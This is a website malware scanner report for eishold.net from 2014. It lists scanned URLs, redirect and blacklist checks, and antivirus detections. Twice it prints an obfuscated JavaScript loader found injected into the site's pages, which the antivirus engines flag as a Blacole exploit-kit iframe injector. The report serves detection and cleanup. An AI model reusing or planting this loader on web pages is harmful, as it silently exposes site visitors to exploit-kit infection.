New scan:

Malware Scanner report for eishold.net

Malicious/Suspicious/Total urls checked
2/0/3
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://eishold.net/
HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Aug 2014 07:55:20 GMT
Location: http://www.eishold.net/
Server: Apache
Content-Length: 268
Content-Type: text/html; charset=iso-8859-1
clean
http://www.eishold.net/
200 OK
Content-Length: 6974
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,31,30,118,96,112,32,107,109,32,60,30,11
... 3012 bytes are skipped ...
111,99,119,46,96,110,112,100,108,100,66,102,105,107,98,40,104,100,114,108,39,59,9,7,9,8,103,102,113,95,109,100,85,97,114,65,114,100,95,116,100,98,32,60,30,116,113,115,101,58,8,32,31,30,32,31,30,32,31,123,10,31,30,32,31,123,99,96,114,99,103,38,101,40,121,105,101,112,97,108,99,87,96,113,67,113,99,97,115,99,100,31,59,32,116,108,100,100,100,105,109,99,100,58,123,10,124,42,32,48,46,48,40,57);}w=f;s=[];for(i=0;-i+1728!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fromCharCode"]((1*w[j]+j%3));}
e(s)

Antivirus reports:

AntiVir
JS/BlacoleRef.W.73
Avast
JS:Decode-JB [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
Trojan.JS.Iframe.COA
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_IFRAMERE.SMJF
Comodo
TrojWare.JS.BlacoleRef.E
McAfee-GW-Edition
JS/Exploit-Blacole.jl
TrendMicro
JS_IFRAMERE.SMJF
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Exploit:JS/Blacole.KH
MicroWorld-eScan
Trojan.JS.Iframe.COA
Fortinet
JS/Blacole.GC!exploit
McAfee
JS/Exploit-Blacole.jl
NANO-Antivirus
Trojan.Script.Iframe.bcsmhk
F-Secure
Trojan.JS.Iframe.COA
F-Prot
JS/IFrame.QW
AVG
HTML/Framer.GB
GData
Trojan.JS.Iframe.COA
Commtouch
JS/IFrame.QW
BitDefender
Trojan.JS.Iframe.COA

http://www.eishold.net/test404page.js
404 Not Found
Content-Length: 9240
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,31,30,118,96,112,32,107,109,32,60,30,11
... 3012 bytes are skipped ...
111,99,119,46,96,110,112,100,108,100,66,102,105,107,98,40,104,100,114,108,39,59,9,7,9,8,103,102,113,95,109,100,85,97,114,65,114,100,95,116,100,98,32,60,30,116,113,115,101,58,8,32,31,30,32,31,30,32,31,123,10,31,30,32,31,123,99,96,114,99,103,38,101,40,121,105,101,112,97,108,99,87,96,113,67,113,99,97,115,99,100,31,59,32,116,108,100,100,100,105,109,99,100,58,123,10,124,42,32,48,46,48,40,57);}w=f;s=[];for(i=0;-i+1728!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fromCharCode"]((1*w[j]+j%3));}
e(s)

Antivirus reports:

AntiVir
JS/BlacoleRef.W.73
Avast
JS:Decode-JB [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
Trojan.JS.Iframe.COA
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_IFRAMERE.SMJF
Comodo
TrojWare.JS.BlacoleRef.E
McAfee-GW-Edition
JS/Exploit-Blacole.jl
TrendMicro
JS_IFRAMERE.SMJF
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Exploit:JS/Blacole.KH
MicroWorld-eScan
Trojan.JS.Iframe.COA
Fortinet
JS/Blacole.GC!exploit
McAfee
JS/Exploit-Blacole.jl
NANO-Antivirus
Trojan.Script.Iframe.bcsmhk
F-Secure
Trojan.JS.Iframe.COA
F-Prot
JS/IFrame.QW
AVG
HTML/Framer.GB
GData
Trojan.JS.Iframe.COA
Commtouch
JS/IFrame.QW
BitDefender
Trojan.JS.Iframe.COA


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: eishold.net

Result:
HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Aug 2014 07:55:20 GMT
Location: http://www.eishold.net/
Server: Apache
Content-Length: 268
Content-Type: text/html; charset=iso-8859-1

...268 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: eishold.net
Referer: http://www.google.com/search?q=eishold.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=eishold.net

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://eishold.net/

Result: eishold.net is not infected or malware details are not published yet.